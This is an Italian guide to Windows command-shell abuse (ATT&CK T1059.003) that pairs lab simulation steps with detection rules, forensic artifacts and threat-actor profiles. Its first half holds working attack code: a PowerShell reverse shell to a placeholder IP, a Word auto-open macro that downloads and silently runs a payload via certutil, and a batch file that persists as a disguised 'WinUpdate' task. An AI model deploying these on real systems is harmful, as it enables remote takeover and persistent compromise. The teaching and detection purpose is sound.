Command Shell: Windows Command Shell (T1059.003)

Per simulare efficacemente questa tecnica in laboratorio, inizia con l'esecuzione remota attraverso servizi come SSH o WinRM. Un comando base per testare l'accesso remoto è:

winrm invoke -ComputerName target01 -ScriptBlock {cmd.exe /c whoami}

I gruppi APT spesso concatenano comandi per ridurre le tracce. APT28 utilizza pattern come cmd.exe /c "command1 && command2" per eseguire sequenze di azioni in un singolo processo. Replica questo comportamento con:

cmd.exe /c "ipconfig /all > %temp%\net.txt && type %temp%\net.txt && del %temp%\net.txt"

Per simulare la persistenza tramite batch script, crea un file .bat che si auto-installa come scheduled task:

echo @echo off > persist.bat
echo schtasks /create /tn "WinUpdate" /tr "%temp%\update.bat" /sc onlogon >> persist.bat
echo copy %0 %temp%\update.bat >> persist.bat

Gli attaccanti avanzati come Lazarus Group utilizzano batch file per eliminare le proprie tracce. Simula questa tecnica con un self-deleting batch:

cmd.exe /c "ping 127.0.0.1 -n 5 > nul & del %0"

La creazione di reverse shell costituisce un pattern comune. APT32 e menuPass implementano shell interattive attraverso:

cmd.exe /c "powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback+'PS '+(pwd).Path+'> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()""

Per testare l'esecuzione attraverso macro Office come FIN7, incorpora questo VBA in un documento Word:

Sub AutoOpen()
    Shell "cmd.exe /c certutil -urlcache -split -f http://192.168.1.100/payload.exe %temp%\svchost.exe && %temp%\svchost.exe", vbHide
End Sub

La detection comportamentale deve focalizzarsi sulle relazioni parent-child anomale. Configura alert per cmd.exe lanciato da processi non standard come winword.exe, excel.exe, o browser web. Il Sysmon EventID 1 cattura queste relazioni:

<RuleGroup name="CMD_Suspicious_Parent">
    <ProcessCreate onmatch="include">
        <Image condition="end with">cmd.exe</Image>
        <ParentImage condition="contains any">winword.exe;excel.exe;powerpnt.exe;msedge.exe;chrome.exe;firefox.exe</ParentImage>
    </ProcessCreate>
</RuleGroup>

I pattern di command-line rappresentano indicatori critici. Monitora parametri sospetti come /c seguito da comandi di discovery (whoami, net user, ipconfig) o download (certutil, bitsadmin). L'EDR dovrebbe flaggare concatenazioni di comandi con operatori && o pipe |.

L'esecuzione di batch file da directory temporanee costituisce un forte indicatore di compromissione. Implementa detection per .bat/.cmd eseguiti da %TEMP%, %APPDATA%, o C:\Users\Public con priorità elevata per path contenenti numeri random o timestamp.

Il timing delle esecuzioni fornisce context cruciale. Cmd.exe lanciato durante orari non lavorativi, specialmente se correlato con connessioni di rete esterne, richiede investigazione immediata. Correla questi eventi con autenticazioni anomale precedenti.

Per ridurre i falsi positivi, costruisci baseline del comportamento amministrativo legittimo. Whitelista script di manutenzione conosciuti basandoti su hash e path fissi. Tuttavia, mantieni visibilità su tutte le esecuzioni di cmd.exe da account privilegiati, poiché 71 gruppi APT abusano proprio di questi contesti trusted.

Gli artefatti di esecuzione cmd.exe persistono in molteplici location. Il Prefetch file C:\Windows\Prefetch\CMD.EXE-*.pf contiene timestamp di esecuzione e file acceduti durante le prime 10 secondi. Analizza questi dati per identificare script o tool lanciati.

La Console History fornisce comandi completi eseguiti. Su Windows 10+, esamina:

• HKCU\Console%SystemRoot%_system32_cmd.exe\HistoryNoDup
• %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

I batch file lasciati sul sistema rivelano le TTP degli attaccanti. Wizard Spider e FIN8 utilizzano .bat per automazione post-compromise. Cerca pattern di naming come kill.bat, update.bat, o nomi randomici in %TEMP%. L'analisi del contenuto rivela target e obiettivi.

L'Event Log Security (EventID 4688) registra ogni creazione di processo con command line auditing abilitato. Filtra per cmd.exe e ricostruisci sequenze di esecuzione. Correla con EventID 4624 per identificare l'account compromesso iniziale.

Le campagne documentate mostrano pattern forensi ricorrenti. Operation Dream Job di Lazarus Group crea folder con timestamp specifici prima di rinominarli. SolarWinds Compromise mostra cmd.exe lanciato da processi di servizio compromessi con delay caratteristici tra comandi per evasione.

La timeline reconstruction deve mappare: initial access → cmd.exe execution → lateral movement → data staging → exfiltration. Cerca cluster di attività cmd.exe correlati con creazione di file ZIP/RAR e connessioni di rete successive.

APT28 (Fancy Bear) utilizza cmd.exe in combinazione con loader trojan custom e macro malevole. Il gruppo russo mostra predilezione per batch script che automatizzano persistence e mantengono footprint minimi. Nel 2022-2024, la campagna Nearest Neighbor ha evidenziato evoluzione verso tecniche WiFi-based con cmd.exe per movimento laterale post-compromissione.

Lazarus Group integra cmd.exe nelle kill chain ransomware e wiper. Il gruppo nordcoreano utilizza distintivi pattern di self-deleting batch file e reverse shell Meterpreter. Operation Dream Job (2019-2020) ha mostrato uso sistematico di cmd.exe per folder manipulation pre-encryption.

APT41 combina cmd.exe con toolset Cobalt Strike per operazioni dual-purpose (cybercrime/espionage). Pattern caratteristici includono cmd.exe /c per reconnaissance seguito da batch file per Cobalt Strike BEACON persistence. La campagna C0017 contro governo USA (2021-2022) ha rivelato rapid exploitation di zero-day con cmd.exe per initial foothold.

FIN7 rappresenta l'eccellenza nell'abuso di cmd.exe per cybercrime finanziario. Kill.bat per disabilitazione AV, reverse shell attraverso USB malevoli che emulano tastiere, e cmd.exe embedded in macro costituiscono signature uniche. L'evoluzione post-2020 mostra shift verso JavaScript/SCT file combination.

Wizard Spider (TrickBot/Ryuk operators) standardizza cmd.exe usage per ransomware deployment. Batch script per lateral movement via PsExec, shadow copy deletion attraverso vssadmin, e cmd.exe per domain reconnaissance precedono sempre Ryuk encryption. Pattern temporali mostrano 2-3 giorni tra initial access e ransomware execution.

I trend emergenti includono: living-off-the-land emphasis con solo cmd.exe/native tools, batch script sempre più offuscati con encoding base64, e integrazione con supply chain attacks dove cmd.exe execution appare legittima perché originata da software trusted compromesso.

Framework MITRE ATT&CK T1059.003 documenta Windows Command Shell abuse attraverso 71 gruppi threat actor e 286 implementazioni malware. Le campagne Operation Dream Job, SolarWinds Compromise, e APT28 Nearest Neighbor forniscono case study dettagliati di evoluzione tattica. Microsoft security guidance e Sysmon configuration references costituiscono risorse fondamentali per detection engineering.